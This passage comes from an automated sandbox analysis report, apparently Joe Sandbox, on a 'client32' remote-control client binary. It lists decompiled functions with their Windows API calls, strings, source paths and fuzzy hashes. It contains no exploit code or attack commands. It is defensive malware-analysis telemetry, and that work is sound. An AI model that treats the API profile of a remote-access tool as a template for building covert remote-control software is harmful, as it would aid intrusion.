                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$CriticalSection$EnterLeave_strncpy
                                                                                • String ID: SetTSModeClientName(%d, %s) ret %d$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                • API String ID: 3891031082-3311166593
                                                                                • Opcode ID: e724e7b83d875102122b1b16448b14bdaea8f0febcc2212ee161bb5a17434397
                                                                                • Instruction ID: d3321afa8f45acf833dece3f06e7fdc0391082dc92555cffabcd4bc49ffbb5d2
                                                                                • Opcode Fuzzy Hash: e724e7b83d875102122b1b16448b14bdaea8f0febcc2212ee161bb5a17434397
                                                                                • Instruction Fuzzy Hash: 6641327AE00A19AFE710DFA4C888F9AFBF4FB05358F014269E89597341D774AC40CB90
                                                                                Function 110DD6D0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 122COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OutputDebugStringA.KERNEL32(NsAppSystem Info : Unexpected data from NsStudentApp...), ref: 110DD77D
                                                                                • std::exception::exception.LIBCMT ref: 110DD7B8
                                                                                • __CxxThrowException@8.LIBCMT ref: 110DD7D3
                                                                                • OutputDebugStringA.KERNEL32(NsAppSystem Info : Control Channel Closed by 0 bytes RECV...), ref: 110DD841
                                                                                • OutputDebugStringA.KERNEL32(NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********), ref: 110DD875
                                                                                  • Part of subcall function 110D7F00: __CxxThrowException@8.LIBCMT ref: 110D7F6A
                                                                                  • Part of subcall function 110D7F00: #16.WSOCK32(?,?,?,00000000,00001000,1B702977,?,00000000,00000001), ref: 110D7F8C
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                Strings
                                                                                • NsAppSystem Info : Unexpected data from NsStudentApp..., xrefs: 110DD775
                                                                                • NsAppSystem Info : Control Channel Waiting For Data..., xrefs: 110DD703
                                                                                • NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********, xrefs: 110DD870
                                                                                • NsAppSystem Info : Control Channel Closed by 0 bytes RECV..., xrefs: 110DD83C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DebugOutputString$Exception@8Throw$_malloc_memsetstd::exception::exceptionwsprintf
                                                                                • String ID: NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********$NsAppSystem Info : Control Channel Closed by 0 bytes RECV...$NsAppSystem Info : Control Channel Waiting For Data...$NsAppSystem Info : Unexpected data from NsStudentApp...
                                                                                • API String ID: 477284662-4139260718
                                                                                • Opcode ID: 818d22774c2ef30dc6ad1cd165df33f034c57c670839690e111d63b4e8da9283
                                                                                • Instruction ID: 0fb2eb5c845aae8e11df8756a30c5633d39706f88fe6ba16aa3ac9f9913de48b
                                                                                • Opcode Fuzzy Hash: 818d22774c2ef30dc6ad1cd165df33f034c57c670839690e111d63b4e8da9283
                                                                                • Instruction Fuzzy Hash: 85414B78E002589FCB15CFA4C990FAEFBB4FF19708F548199E41AA7241DB35A904CFA1
                                                                                Function 1103D2B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113filewindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindWindowA.USER32(NSMW16Class,00000000), ref: 1103D2E4
                                                                                • SendMessageA.USER32(00000000,0000004A,00040310,?), ref: 1103D313
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1103D353
                                                                                • CloseHandle.KERNEL32(?), ref: 1103D364
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFileFindHandleMessageSendWindowWrite
                                                                                • String ID: CLTCONN.CPP$NSMW16Class
                                                                                • API String ID: 4104200039-3790257117
                                                                                • Opcode ID: 7bae25e5ec6ac12795ee0301b5ed4f221613fcdb06e7094a7561e2cb570cb440
                                                                                • Instruction ID: 7413f3f2c5586e26beac36a23cabaf74cb1d99cfb277255675335e3274ed5d18
                                                                                • Opcode Fuzzy Hash: 7bae25e5ec6ac12795ee0301b5ed4f221613fcdb06e7094a7561e2cb570cb440
                                                                                • Instruction Fuzzy Hash: AC418E75A0020AAFE715CFA0D884BDEF7ACBB84719F008659F85997240DB74BA54CB91
                                                                                Function 1113F0E0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 111windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,00000000,00000000), ref: 1113F116
                                                                                • MessageBeep.USER32(00000000), ref: 1113F1C9
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,00000000,00000000), ref: 1113F1F4
                                                                                • UpdateWindow.USER32(?), ref: 1113F21B
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessageWindow$BeepErrorExitInvalidateLastProcessRectUpdatewsprintf
                                                                                • String ID: NSMStatsWindow Read %d and %d (previous %d)$NSMStatsWindow Add value %d$NSMStatsWindow::OnTimer$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 490496107-2775872530
                                                                                • Opcode ID: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
                                                                                • Instruction ID: d3d90aad3bca8c51e092343d299df36488d3ee70d707c240b8c59d5b32e4b979
                                                                                • Opcode Fuzzy Hash: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
                                                                                • Instruction Fuzzy Hash: 1D3114B9A5031ABFD710CB91CC81FAAF3B8AB84718F104529F566A76C4DA70B900CB52
                                                                                Function 110416A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 108librarythreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClassNameA.USER32(?,?,00000080), ref: 110416E7
                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 11041719
                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11041734
                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 11041749
                                                                                  • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                  • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                  • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000104), ref: 110417DD
                                                                                • FreeLibrary.KERNEL32(?), ref: 110417EE
                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$AddressLibraryNameProc$ClassCloseFileFreeHandleImageLoadOpenThreadWindow_strrchr
                                                                                • String ID: NSSWControl32$pcinssui.exe$psapi.dll
                                                                                • API String ID: 2388757878-1455766584
                                                                                • Opcode ID: 5f146f9da64c4dccdfb278daa74c9d8ed5af3ff81ea7aaf1d32a0e06f673e47e
                                                                                • Instruction ID: 52c903991e8a4b03fd7171fe37ee29b83fe9f1de1022b00e10817fd4b2db0e2c
                                                                                • Opcode Fuzzy Hash: 5f146f9da64c4dccdfb278daa74c9d8ed5af3ff81ea7aaf1d32a0e06f673e47e
                                                                                • Instruction Fuzzy Hash: 4E411A75E412299FEB10CF65CC94BEAFBB8FB09304F5045E9E91993640D770AA848F50
                                                                                Function 11023470 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowTextLengthA.USER32(?), ref: 11023491
                                                                                • GetDlgItem.USER32(00000000,000013AB), ref: 110234D4
                                                                                • ShowWindow.USER32(00000000), ref: 110234D7
                                                                                • GetDlgItem.USER32(00000000,000013AB), ref: 11023521
                                                                                • ShowWindow.USER32(00000000), ref: 11023524
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • GetDlgItem.USER32(00000000,?), ref: 1102356B
                                                                                • EnableWindow.USER32(00000000,00000000), ref: 11023577
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Item$Show$EnableErrorExitLastLengthMessageProcessTextwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                • API String ID: 3823882759-1986719024
                                                                                • Opcode ID: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
                                                                                • Instruction ID: 3a296536204feeda3cf5b5ace87cff4b3db999d64eabd005e2355b496405e70e
                                                                                • Opcode Fuzzy Hash: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
                                                                                • Instruction Fuzzy Hash: ED214875E04329BFD724CE61CC8AF9EB3A8EB4871CF40C439F62A5A580E674E540CB51
                                                                                Function 11147090 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 76librarytimeloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,76968400), ref: 11145CA0
                                                                                  • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                  • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                  • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                • LoadLibraryA.KERNEL32(secur32.dll,1B702977,?,?,?), ref: 111470D1
                                                                                • GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 111470E9
                                                                                • timeGetTime.WINMM(?,?), ref: 111470FC
                                                                                • timeGetTime.WINMM(?,?), ref: 11147113
                                                                                • GetLastError.KERNEL32(?,?), ref: 11147119
                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 1114713B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryTimetime$AddressErrorFreeLastLoadOpenProcVersion_memset_strncpy
                                                                                • String ID: GetUserNameEx ret %d, %s, time=%d ms, e=%d$GetUserNameExA$secur32.dll
                                                                                • API String ID: 2282859717-3523682560
                                                                                • Opcode ID: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
                                                                                • Instruction ID: 239420fb0a48951737c4620445babbd702d2d5c7b2e12e3c68ea42fdfe54a75f
                                                                                • Opcode Fuzzy Hash: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
                                                                                • Instruction Fuzzy Hash: 0A219875D04629ABDB149FA5DD44FAFFFB8EB05B14F110225FC15E7A44E73059008BA1
                                                                                Function 110377F0 Relevance: 15.2, APIs: 10, Instructions: 228COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItemTextA.USER32(?,?,?,00000080), ref: 11037824
                                                                                • SelectObject.GDI32(?,?), ref: 11037872
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 110378C6
                                                                                • GetBkColor.GDI32(?), ref: 11037A5C
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 110378F9
                                                                                  • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
                                                                                  • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
                                                                                  • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 11037923
                                                                                • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 11037938
                                                                                • DrawTextA.USER32(?,?,?,?,00000410), ref: 11037AC4
                                                                                • DrawTextA.USER32(?,?,?,?,00000010), ref: 11037B37
                                                                                • SelectObject.GDI32(?,00000000), ref: 11037B49
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Text$ColorInflateRect$DrawObjectSelect$ExtentItemPoint32
                                                                                • String ID:
                                                                                • API String ID: 649858571-0
                                                                                • Opcode ID: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
                                                                                • Instruction ID: f09bb6a206b11b6dc813d6ae8b65a0757b728a19553feb9795e3200704aae7d5
                                                                                • Opcode Fuzzy Hash: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
                                                                                • Instruction Fuzzy Hash: A1A159719006299FDB64CF59CC80F9AB7B9FB88314F1086D9E55DA3290EB30AE85CF51
                                                                                Function 11025480 Relevance: 15.2, APIs: 10, Instructions: 207windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetFocus.USER32(?), ref: 110254CE
                                                                                • GetDlgItem.USER32(?,00001396), ref: 110254E2
                                                                                • CreateCaret.USER32(00000000,00000000,00000000,?), ref: 11025501
                                                                                • ShowCaret.USER32(00000000), ref: 11025515
                                                                                • DestroyCaret.USER32 ref: 11025529
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Caret$CreateDestroyFocusItemShow
                                                                                • String ID:
                                                                                • API String ID: 3189774202-0
                                                                                • Opcode ID: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
                                                                                • Instruction ID: d774194b0a6d8be079c8d936a3d9a24877d34e73af743b83035fdfa72e7830a2
                                                                                • Opcode Fuzzy Hash: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
                                                                                • Instruction Fuzzy Hash: 1E61D375B002199BE724CF64DC84BEE73E9FB88701F504959F997CB2C0DA76A841C7A8
                                                                                Function 110351C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 110351E0
